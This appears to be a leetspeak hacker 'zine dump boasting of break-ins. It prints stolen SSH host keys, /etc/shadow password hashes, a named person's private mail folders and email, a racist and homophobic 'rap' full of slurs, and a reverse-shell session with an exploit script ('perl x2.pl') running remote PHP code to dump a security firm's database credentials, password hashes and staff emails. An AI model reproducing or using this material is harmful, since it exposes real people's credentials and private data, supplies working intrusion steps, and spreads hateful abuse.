fw01,216.234.189.4 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ==
srv01,216.234.189.7 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAt8JHM7YHSlM4OIV87+tu2/eDY8ImO/k5uPsJomIqlC7/hN45SXsZ07gLQ8OEBmNPyN+bNWP2TRvjykcBsSeVIAy8jdZE1yt5lT4gGAOGyfawZwBh1EFqCnHoECqc2u3Cha1bLV+jDNAwzTj5oQrv9DMcBo8T3kuDuovL/DJJLjk=
fw01.seifried.org ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ==
srv05,216.234.189.11 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEApEmVQUZUs6ajW/6Kyddfj3zMa60gzYmbBTuDELy1I9bfYHO6D4835HlJnT3cNovuACoMrzs9y0tJGANvox5rJ20Slm6KE2PH0twS0lZcd4cOMtKhOUcGuch/aXTNnGDhrsFQNf3PHxKRuM0AT2qjvLLlghIhYntLSrergb7CZT0=
srv00,216.234.189.6 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuL/2zr2HSNfyBDuuHFoCbvS8Q/rZeCXFTMWZOPdvMEFZ6wve9phCPb1dwEj7kOlqTpZ+iq9uH/LCPfdVjaBIOAcN4BrZRuv3ABIZZ3MndkD+Q5kfoTZ7LUYgivladV+AYwscyxjU3LvPh4AFM/HrrQBJvVTN39ty/qNOmPh89sc=
undeadly.org,66.51.111.60 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtRx9+LNuWKXBPRsyMWk3Snzzrcft91cWtQc3d8i+qccY42Rz2QAFPuxLeBiOYwE0EI0TL/t3gmhML5ywktFN8jhWNk+m/hLSYTVOZ4ckXg37uJLdJRIx3KlybJhlGuXADYCDcjIfj4cNOnqW9KHwJmFIc/X7PoBXojYZAXlXk90ELl4csAwcDCZRInh49vEaRHE4jj/yvgpXrZBErTFZgmY21Btnbmj1olRRs2HfDd60t/BzGXQs9P6gI2EP01ONF9OWZAX+CNRC/ru+yVR/mVx0i4Ah5Osd5GZIhxMQLLjYW/HOd/+weIPc09xv4io+01VyH2zmOOf/rOAYJcBTSQ==
sputnik.firstfoundation.ca,142.179.165.115 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAv8//etsP6DIW3wKQl0ggaGrLb9Y2JR9CzW6ADFyDZwWwIpBZ7dE+0dYN4LeyrXWhVUnX1QDY5z8CpI6zoLpmrmKFMyoxE+fkfqFAbQeqcjJwnf77XHYaqEYYcOyssZFD67M/hu9LmcJXZ725hWmCLZH3SNblS1wVqIBXuv7ZNkk=
# grep -v '*' /etc/shadow | grep -v '!'
root:$1$JOEv50Xr$Hhe.Uun5STrEpxilm0dz//:13192:0:99999:7:::
seifadm:$1$JauNGolY$GRPOj.WdEH63ehURLtdcP1:13192:0:99999:7:::
# ssh srv01.seifried.org
root@srv01.seifried.org's Password:
# grep -v '*' /etc/shadow | grep -v '!'
root:$1$k4NSHkWi$wWfG2vILiWiV1mgkUxt1T/:13174:0:99999:7:::
# ssh srv03.seifried.org
root@srv00.seifried.org's Password:
# grep -v '*' /etc/shadow | grep -v '!'
root:$1$4u15hKhb$ZIpCxjsMgILB3PtuwzoqJ0:13195:0:99999:7:::
seifadm:$1$QttOF4NI$FxPCgKBlW6GGHWTVg9TAC/:13195:0:99999:7:::
kurt:$1$T.6KJ61W$0.gmpZrsOw6uKRSScifM//:13199:0:99999:7:::
bt:$1$6cvGun1f$jkMo9kqDjmQuv./66h0B41:13199:0:99999:7:::
listuser:$1$6cvGun1f$jkMo9kqDjmQuv./66h0B41:13199:0:99999:7:::
freescan2:$1$AjenHD.3$A8GlIW6VKOS4FQ7soTkn..:13199:0:99999:7:::
helen:$1$Gj6BQ.Qt$yneo5WlvCoRIbRvHEeQPH0:13199:0:99999:7:::
neil:$1$JWGjqsKY$81MQ/ViZ0wL98N2VFxjFy.:13199:0:99999:7:::
anke:$1$uAk6tGUC$EGHcjiQZ/QXdd0B5RkG3m.:13199:0:99999:7:::
ensimwpl:$1$4Aac3MrU$QniFg8EUaxoSr9M7flnyn.:13217:0:99999:7:::
#ls /home/kurt/mail
1009067.html
37
Drafts
Junk E-mail
Sent
Sent Items
Trash
all
business
cissp
conference
cve
dance
dating
edmforsale
ensim
foo
foo~
freescan
google-ads
inbox
jimreavis
lavalife
lavalife-Shannon
list-mod-archives
list-moderation
old
old-email
old-sent-items
paper
personalbest
ports
portslist
receipts
saved-messages
security-book
securityscanner
spam
test
test90
tuesday-meeting
verisign
viruses
# cat /home/kurt/mail/Sent\ Items
-~-~-~
3d1t3d du3 t0 l4m3n3zz
-~-~-~
#
w3 3nj0y3d th3 punctu4t10n & th3 w3ll us3 0f 4dj3ct1v3z 1n th3 vip@idefense.com
3m41lz, 4lth0ugh th3y w3r3 3xtr3m3ly b0r1ng. y0u'd th1nk w1th 4ll th3 drug
4dd1ctz @ idefense th3y w0uld b3 a b1t m0r3 l1v3ly. 4ls0.. sh0uldnt y0u guyz b3
uz1ng pgp 0r s0m3th1ng? h0no w1ll 0ff3r a 0n3 t1m3 s3cur1ty 4ud1t 0f th3
v3r1s1gn vpnz 1f y0u pr0m0t3 th3 d4t4th31f t0 l34d th3 p3nt3zt1ng (w3 h34r h3'z
g0t th3 0d4yz).
0n3 m0r3 th1ng.. th1z 3m41l m4d3 uz sp1t 0ur m1lk 0ut.
From kurt@srv00.seifried.org Thu Oct 27 01:52:06 2005
Reply-To: "Kurt Seifried" <kurt@seifried.org>
From: "Kurt Seifried" <kurt@seifried.org>
To: "Jim Reavis" <jim@reavis.org>
References: <E14947B05218D111AC9000AA002F4CE3BC241B@P5100>
Subject: Re: invoice for Sept
Date: Thu, 27 Oct 2005 01:52:06 -0600
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
Status: RO
Content-Length: 4333
X-UID: 5842
X-Keywords:
> Just getting around to paying this today, sorry for the delay, have been
> traveling too much.
No problem,
> I haven't given you anything to do for your Oct invoice, maybe you could
> do
> a little thinking for me on:
One random thought: Cisco's new Layer two control plans, have an agent on
the system/etc, what about IP devices that can't run the agent and need
network access, and have sufficiently complex software to be a problem, like
VOIP phones (most of which seem to have a web setup), it occurs to me an
attacker can simply arp spoof/etc an IP device that doesn't have to run the
agent.
> Secure Software Development - anything out there interest you in terms of
> tools or methodologies? (Fortify, Ounce Labs, etc) I am attaching a preso
> MS does, interested in your reaction to what they are doing, is it good?
They're getting slightly better but one huge hole is QA. I found yet another
gaping flaw in PGP that is trivial to test (took me 10 seconds to find it
once I decided to look for it) and should have been addressed with the last
bug report I did on PGP with respect to alternate data streams. PGP is
obviously not doing any real QA, and if they are they're ignoring the
results (scary either way).
> Any perspective about where companies are overspending/underspending on
> security?
Corporations I think are probably spending more on technology when they
could get a better return by investing in people and process. Good change
control/up to date patching and (boring bit here) enforcing least privilege
would go a long way. I recently spent 3 hours totally tightening up the
firewalls for seifried.org (I now allow SYN in for a few tcp ports, and for
UDP on port 53 and established connections out with a default deny policy),
restricting ssh (listen on the main IP only, only allow "seifried" in),
restricting various services (i.e. WWW servers now listen only on the
specific IP's that are needed, not every IP attached to the system). But now
the only way you can get interactive shell access to seifried.org is with my
password (which I plan to block soon and only allow public key auth). The
service listening lock down is especially useful since any changes now
require tweaking the firewall and the server to expose a new service to the
world, I'm unlikely to accidently expose something if I have to make two
sets of different changes on different systems, my goal is to make it hard
for me to make mistakes.
> Anything interesting you are seeing from the threat side or any other
> angle,
> interesting investment oppty, etc?
A lot more use of intelligence. I'm seeing SSH login attempts for adm, root,
ftp and so on, and for the account my mother uses (anke@seifried.org, a very
uncommon name to say the least), obviously harvested from somewhere (she
doesn't have a web page though.....). This is a hell of a lot more likely to
be effective then randomly blasting away at user accounts, and names can be
harvested via google/etc, so the target won't know. I suspect longer term
we'll see very intelligent account enumeration (troll google, etc.), which
is worrying for larger sites that may not have good password
policies/enforcement. Botnet activity of course is huge and only going to
get worse (it's where the money is).
Another interesting thing that happened to me was my website being spammed.
I run a wiki (seifried.org/security/), was allowing anonymous edits (not
anymore), someone edited one of the help pages (out of the way) to have
links to various pharma spam sites, then a while later according to the logs
google rolled through, then the (scary part here) spammer went through and
cleaned up the changes. No way I would have noticed this if I didn't
actually read the change logs. So using my google page rank of 5 or so (and
who knows how many other sites) they have improved their google ranking
considerably. Sadly I can't win that war (registering an account is trivial
and adding that capability to the spam bot wouldn't be to hard). This will
mean CAPTCHA (sp?) tests for all wiki edits and who knows what else.
Attackers that clean up worry me because it indicates that they're smart and
probably want to come back (don't make it so painful that the target fixes
the problem).
> Thanks!
>
> Jim Reavis
-Kurt
11.txt -~-~-~ 0d4y iCER r4pz
and "True Elitez"
rap by iCER (#!blackhat @ efnet)
yo nigga
iCER in the house
sittin in my crib
wearin' my mom's blouse
sometimes i smoke crack
i wish i was black
don't worry nigga
i'll overflow yo stack
cuz i'm elite
az elite as they come
all i do is hack
which is why i'm a bum
sittin with my laptop
drinkin some rum
now i know what u think
hackin'z hard
but not for me nigga
i pull that 0day trigga
sittin on eye-are-sea all day
with my main man bx
ill teach lamerz a lesson
fuck them fuckz up
with some mad password guessin
login into sshd'z
i tried to fuck my sister
but she's a goddamn tease
oh well homie,
at least hackin'z a breeze
some people steppin
so i get to strcpy greppin
sometimes it dont work
so i go to bugtraq
my hackin skillz dont lack
'cause i fuckin read phrack
ratta tat tat there goes 0day gat
my hackin skillz are like artillery
im a maniac on your network
fuckin around with your filesystemz
u dont know where the bd'z lurk
[chorus]
i'll ice you
i'll ice ur friendz
nigga ill ice ur box
i'm as slick as a fox
my hackin skillz rox
[/chorus] x 4
fuck with my crew
and you'll be black and blue
im hard as a rock
my condom is a dirty sock
ddos me, hell no
ill put ur box on lock
im all about sellin cool drugz
cuz im hardcore
bx is my blackhat homie
we true blackhatz
but we dont do illegal shit
just chillin in eye-are-see
thatz my crib fo sho
i keep my shit on the low
i'm iCER nigga
i'll fuck you in the butt
it feels real good
just call me a gay slut
and i wont give ur butt a cut
last time i fucked
i gave bx 6 stitches on his ass
he liked it a lot
and then we smoked some pot
you think your game for the big iCER?
i'll own your ass
unless you be a little nicer!@!
some say im like big gay al
lisp and all
my ass will give you a growl
now im a social engineer
i got mad tekneeqz
last time i took a shower
was two fuckin weeks
and now my ass fuckin reaks
#!blackhat is the place
to show ur hackin grace
ill suck on bx tits
and take two big shits
we're true blackhats
nobody can beat us
not even pee-aych-sea
cuz japboy cant crack our key
so tell me what you wanna be
ill hack you and let a virus free
if anyone is leet itz me
[chorus] x 5
12.txt -~-~-~ core-sdi b1t3z th31r t0ngu3.
pl34s3 n0t3, w3 d0 n0t t4k3 subm1ss10nz. w3 f0und th1s f1l3 0n a l4rg3 sh3ll
pr0v1d3r.
(root@host)# ./listen -p9090
[w41t1ng..]
[g0t c0nn3ct10n!]
$ uname -a
OpenBSD kenny.corelabs.core-sdi.com 3.3 GENERIC#1 i386
$ cat config.php | grep -v '//'
<?php
$pnconfig['dbtype'] = 'mysql';
$pnconfig['dbtabletype'] = 'myisam';
$pnconfig['dbhost'] = '127.0.0.1';
$pnconfig['dbuname'] = 'cm9vdA==';
$pnconfig['dbpass'] = 'NzNsaCx4';
$pnconfig['dbname'] = 'Comunnity';
$pnconfig['system'] = '0';
$pnconfig['prefix'] = 'impact';
$pnconfig['encoded'] = '1';
GLOBAL $pndebug;
$pndebug['debug'] = 0;
$pndebug['debug_sql'] = 0;
if (@file_exists("personal_config.php"))
{ include("personal_config.php"); }
extract($pnconfig, EXTR_OVERWRITE);
?>
$ ls -a
.
..
javascript
pnadodb
kb
images
docs
language
themes
includes
modules
welcome
mainfile.php
modules.php
pntables.php
print.php
referer.php
robots.txt
user.php
admin.php
xmlrpc.php
backend.php
banners.php
config-old.php
config.php
error.php
footer.php
header.php
index.php
pntables.php.orig
pntables.php.buchu
modules.php.orig
exploits
welcome_old
imps
$ ls -a ../
.
..
impact
index.html
oss
impact_devel
impact_new
default
$ ls -a ../../
.
..
run
var
index.html
cgi-bin
conf
htdocs
icons
logs
users
$ ls -a ../../conf/
.
..
httpd.conf
httpd.conf-dist
magic
mime.types
php.ini
httpd.conf.bak
php.ini.bak
$ ls -a ../../logs/
.
..
error_log
ssl_engine_log
access_log
etag-state
httpd.pid
ssl_scache.db
oss-error_log
oss-access_log
default-error_log
default-access_log
access_log_comb
oss-access_log_comb
$ ls -a ../../cgi-bin/
.
..
printenv
test-cgi
[c0nn3ct10n dr0pd]
(root@host)#
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root','
73lh,x');mysql_select_db('mysql', \$con);\$res=mysql_query('select * from user', \$con) or die('whh');mysql_close(\$con);if(\
$res){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}"
[*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('mysql', $con);$res=mysql_query('select * from user', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');}
[*] Command sent, waiting for response
succarray(17) {
["Host"]=>
string(1) "%"
["User"]=>
string(4) "root"
["Password"]=>
string(16) "198b1a3c66d30d36"
["Select_priv"]=>
string(1) "Y"
["Insert_priv"]=>
string(1) "Y"
["Update_priv"]=>
string(1) "Y"
["Delete_priv"]=>
string(1) "Y"
["Create_priv"]=>
string(1) "Y"
["Drop_priv"]=>
string(1) "Y"
["Reload_priv"]=>
string(1) "Y"
["Shutdown_priv"]=>
string(1) "Y"
["Process_priv"]=>
string(1) "Y"
["File_priv"]=>
string(1) "Y"
["Grant_priv"]=>
string(1) "Y"
["References_priv"]=>
string(1) "Y"
["Index_priv"]=>
string(1) "Y"
["Alter_priv"]=>
string(1) "Y"
}
------array(17) {
["Host"]=>
string(9) "localhost"
["User"]=>
string(0) ""
["Password"]=>
string(0) ""
["Select_priv"]=>
string(1) "N"
["Insert_priv"]=>
string(1) "N"
["Update_priv"]=>
string(1) "N"
["Delete_priv"]=>
string(1) "N"
["Create_priv"]=>
string(1) "N"
["Drop_priv"]=>
string(1) "N"
["Reload_priv"]=>
string(1) "N"
["Shutdown_priv"]=>
string(1) "N"
["Process_priv"]=>
string(1) "N"
["File_priv"]=>
string(1) "N"
["Grant_priv"]=>
string(1) "N"
["References_priv"]=>
string(1) "N"
["Index_priv"]=>
string(1) "N"
["Alter_priv"]=>
string(1) "N"
}
------array(17) {
["Host"]=>
string(5) "kenny"
["User"]=>
string(0) ""
["Password"]=>
string(0) ""
["Select_priv"]=>
string(1) "N"
["Insert_priv"]=>
string(1) "N"
["Update_priv"]=>
string(1) "N"
["Delete_priv"]=>
string(1) "N"
["Create_priv"]=>
string(1) "N"
["Drop_priv"]=>
string(1) "N"
["Reload_priv"]=>
string(1) "N"
["Shutdown_priv"]=>
string(1) "N"
["Process_priv"]=>
string(1) "N"
["File_priv"]=>
string(1) "N"
["Grant_priv"]=>
string(1) "N"
["References_priv"]=>
string(1) "N"
["Index_priv"]=>
string(1) "N"
["Alter_priv"]=>
string(1) "N"
}
------array(17) {
["Host"]=>
string(1) "%"
["User"]=>
string(4) "paco"
["Password"]=>
string(16) "184b39817e29f164"
["Select_priv"]=>
string(1) "Y"
["Insert_priv"]=>
string(1) "Y"
["Update_priv"]=>
string(1) "Y"
["Delete_priv"]=>
string(1) "N"
["Create_priv"]=>
string(1) "N"
["Drop_priv"]=>
string(1) "N"
["Reload_priv"]=>
string(1) "N"
["Shutdown_priv"]=>
string(1) "N"
["Process_priv"]=>
string(1) "N"
["File_priv"]=>
string(1) "N"
["Grant_priv"]=>
string(1) "N"
["References_priv"]=>
string(1) "N"
["Index_priv"]=>
string(1) "N"
["Alter_priv"]=>
string(1) "N"
}
------(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Comunnity', \$con);\$res=mysql_query('show tables', \$con) or die('whh');mysql_close(\$con);if(\$re
s){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}"
[*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Comunnity', $con);$res=mysql_query('show tables', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');}
[*] Command sent, waiting for response
succarray(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_autolinks"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(15) "impact_autonews"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_banner"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(19) "impact_bannerclient"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(19) "impact_bannerfinish"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_blocks"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(21) "impact_blocks_buttons"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(15) "impact_comments"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_counter"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(27) "impact_downloads_categories"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(26) "impact_downloads_downloads"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(27) "impact_downloads_editorials"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(27) "impact_downloads_modrequest"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(28) "impact_downloads_newdownload"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(30) "impact_downloads_subcategories"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(25) "impact_downloads_votedata"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(12) "impact_ephem"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_faqanswer"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(20) "impact_faqcategories"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(23) "impact_group_membership"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_group_perms"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_groups"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_headlines"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(12) "impact_hooks"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(25) "impact_languages_constant"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(21) "impact_languages_file"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(28) "impact_languages_translation"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(23) "impact_links_categories"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(23) "impact_links_editorials"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_links_links"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(23) "impact_links_modrequest"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(20) "impact_links_newlink"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(21) "impact_links_votedata"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_message"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_module_vars"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_modules"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_poll_check"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_poll_data"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_poll_desc"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(19) "impact_pollcomments"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_priv_msgs"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(12) "impact_queue"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_quotes"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_ratings"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_ratingslog"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_realms"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_referer"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_related"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_reviews"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_reviews_add"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(23) "impact_reviews_comments"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(19) "impact_reviews_main"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_seccont"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_seccontnew"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(15) "impact_sections"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_sectionsnew"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(19) "impact_session_info"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_stats_date"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_stats_hour"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_stats_month"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_stats_week"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_stories"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_stories_cat"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_topics"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_user_data"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_user_perms"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(20) "impact_user_property"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_userblocks"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(12) "impact_users"
}
------(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root','
73lh,x');mysql_select_db('Comunnity', \$con);\$res=mysql_query('select * from impact_users', \$con) or die('whh');mysql_close
(\$con);if(\$res){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}"
[*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Comunnity', $con);$res=mysql_query('select * from impact_users', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');}
[*] Command sent, waiting for response
succarray(31) {
["pn_uid"]=>
string(1) "1"
["pn_name"]=>
string(0) ""
["pn_uname"]=>
string(9) "Anonymous"
["pn_email"]=>
string(0) ""
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(0) ""
["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1058302436"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
string(1) "0"
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(0) ""
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(0) ""
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(4) "12.0"
}
------array(31) {
["pn_uid"]=>
string(1) "2"
["pn_name"]=>
string(14) "Bruno Acselrad"
["pn_uname"]=>
string(5) "buchu"
["pn_email"]=>
string(22) "buchu@coresecurity.com"
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(27) "http://www.coresecurity.com"
["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1058302436"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
string(1) "0"
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(32) "922ed3056a156d0c2a868ae91c735410"
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(7) "Core-v1"
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "1"
["pn_timezone_offset"]=>
string(4) "12.0"
}
------array(31) {
["pn_uid"]=>
string(1) "3"
["pn_name"]=>
string(0) ""
["pn_uname"]=>
string(4) "Test"
["pn_email"]=>
string(16) "buchu@corest.com"
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(0) ""
["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1059683345"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
NULL
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(32) "c6c7b5e75856d69c00449ad9153f541c"
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(0) ""
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(4) "12.0"
}
------array(31) {
["pn_uid"]=>
string(1) "4"
["pn_name"]=>
string(10) "Alex Horan"
["pn_uname"]=>
string(4) "alex"
["pn_email"]=>
string(27) "alex.horan@coresecurity.com"
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(7) "http://"
["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1078774842"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
NULL
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(32) "ea045a641ee701b44a2f0b04f4fb8b33"
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(0) ""
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(3) "7.0"
}
------(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root','
73lh,x');mysql_select_db('Community', \$con);\$res=mysql_query('select * from impact_users', \$con) or die('whh');mysql_close
(\$con);if(\$res){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}"
